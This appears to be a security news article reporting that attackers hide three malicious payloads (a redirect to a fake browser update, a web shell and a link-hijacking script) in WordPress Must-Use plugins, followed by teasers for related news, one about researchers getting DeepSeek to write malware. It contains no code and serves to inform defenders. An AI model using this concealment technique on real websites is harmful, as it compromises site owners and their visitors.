The technique was first discovered in February 2025, but its spread rate is continuously growing, and currently attackers abuse MU plugins to run three different types of malicious code.
Must-Use Plugins represent a special type of WordPress plugins that run every time the page is loaded and don’t require activation in the Admin Panel. These PHP files are stored in the wp-content/ directory, are executed automatically, and don’t appear in the Admin Panel on the Plugins page unless the Must-Use filter is selected.
Among other things, such plugins are used to enforce custom security rules across the website, boost performance, dynamically modify variables, etc.
Since MU plugins are executed on every page load and don’t appear in the standard plugin list, they can be used to covertly perform a wide range of malicious operations (e.g. steal credentials, inject malicious code, or modify HTML output).
Sucuri experts discovered three different payloads placed by cybercriminals to the MU-plugins directory:
-
redirect.redirects visitors (excluding bots and logged in admins) to the malicious website updatesnow[.]net that displays a fake browser update prompt to trick the victim into downloading malware;php -
index.is a web shell that acts as a backdoor by downloading and executing PHP code from a GitHub repository; andphp -
custom-js-loader.loads JavaScript that replaces all images on the website with explicit content, hijacks all external links, and opens fraudulent pop-ups instead.php
The most dangerous payload is the web shell since it enables attackers to remotely execute commands on the server, steal data, and deliver subsequent attacks on resource users and visitors.
The other two malware samples are more likely to damage the website’s reputation and its SEO rankings due to suspicious redirects and attempts to install malware on visitors’ computers.
The infection technique used by the malefactors remains unknown yet. Its assumed that the attackers exploit known vulnerabilities in WordPress plugins and themes or weak admin credentials.
2025.03.20 — 8,000 vulnerabilities identified in WordPress ecosystem in 2024
According to Patchstack, world's #1 WordPress vulnerability intelligence provider, 7,966 new vulnerabilities were identified in the WordPress ecosystem in 2024; most of these bugs affected plugins…
Full article →
2025.01.24 — Hundreds of websites impersonating Reddit and WeTransfer spread Lumma Stealer
Sekoia researcher crep1x discovered that hackers are currently using some 1,000 pages impersonating Reddit and WeTransfer. Victims visiting these sites are tricked into…
Full article →
2025.03.24 — Alexa to stop processing data locally. All voice requests will be sent to Amazon Cloud
Amazon announced that the privacy option allowing users of Echo speakers to avoid sending their voice recordings to the company's cloud will no longer be supported. Effective March…
Full article →
2025.04.23 — Improper authentication control vulnerability affects ASUS routers with AiCloud
ASUSTeK Computer Inc. fixed an improper authentication control vulnerability in routers with AiCloud. The bug allows remote attackers to perform unauthorized actions on vulnerable devices. The issue…
Full article →
2025.04.25 — Asus patches vulnerability in AMI's MegaRAC enabling attackers to brick servers
Asus released patches for the CVE-2024-54085 vulnerability that allows attackers to seize and disable servers. The security hole affects the American Megatrends International (AMI) MegaRAC Baseboard Management…
Full article →
2025.04.10 — April updates released by Microsoft cause issues with Windows Hello
Microsoft warns that some Windows users who have installed the April updates might be unable to login to their Windows services using Windows Hello facial recognition…
Full article →
2025.02.18 — Chrome Enhanced Protection mode is now powered by AI
The Enhanced Protection mode in Google Chrome has been updated. Now it uses AI to protect users from dangerous sites, downloads, and extensions in real time.…
Full article →
2025.02.25 — More than 100,000 users downloaded SpyLend malware from Google Play Store
According to Cyfirma, a malicious Android app called SpyLend was available on the official Google Play Store for some time and has been downloaded from there…
Full article →
2025.01.29 — Google to disable Sync in older Chrome versions
Google announced that in early 2025, Chrome Sync will be disabled in Chrome versions older than four years. Chrome Sync enables users to save and sync their…
Full article →
2025.03.16 — Researchers force DeepSeek to write malware
According to Tenable, the AI chatbot DeepSeek R1 from China can be used to write malware (e.g. keyloggers and ransomware). DeepSeek was released in January 2025 and caused a stir…
Full article →